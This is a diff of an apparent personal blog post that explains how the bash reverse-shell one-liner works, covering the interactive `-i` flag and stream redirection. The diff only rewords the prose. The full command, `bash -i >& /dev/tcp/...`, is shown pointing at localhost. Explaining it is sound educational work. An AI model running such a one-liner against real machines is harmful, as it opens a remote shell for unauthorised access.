sainaen/hypothetical.me/content/post/2018-01-10_reverse_shell_in_bash.md

 $ bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
 ```

 And it works!
-Now let’s figure out one peace at the time, starting from `bash -i`.
+Now, let’s figure it out one peace at the time, starting from `bash -i`.

 ## Interactive Bash

-According to the [Bash] man page (`man bash`), option `-i` means that the bash is forced to start an _“interactive shell.”_ The _INVOCATION_ section explains that non-interactive shell will not execute its startup files: `/etc/profile`, `~/.profile`, `~/.bashrc`, etc. It also says that Bash starts in this interactive mode automatically when there are no non-option arguments (unless you pass a command to execute with `-c`) and when its standard input and error streams are both connected to terminals.
+According to the [Bash] man page (`man bash`), option `-i` means that we’re starting an _“interactive shell.”_ The _Invocation_ section then explains that non-interactive shell will not execute its startup files: all those `/etc/profile`, `~/.profile`, `~/.bashrc`, etc. It also says that Bash automatically starts in this interactive mode when there are no non-option arguments (unless you pass a command to execute with a `-c`) and when its standard input and error streams are both connected to terminals.

 {{<lead>}}So why would we want an interactive shell?{{</lead>}} I think, just because it will be more like shells that we’re used to&#8239;---&thinsp;with default aliases, correctly set `PATH`, and a [prompt].

-{{<lead>}}Ok, and why isn’t it interactive right away?{{</lead>}} Those angle brackets that we have in our command typically used to redirect standard streams; they probably make Bash think that it isn’t running in the terminal.
+{{<lead>}}Ok, and why isn’t it interactive in our case?{{</lead>}} Those angle brackets in our command redirect standard streams; this probably make Bash think that it isn’t running in the terminal.
 Let’s look into it.

 ## Network Redirection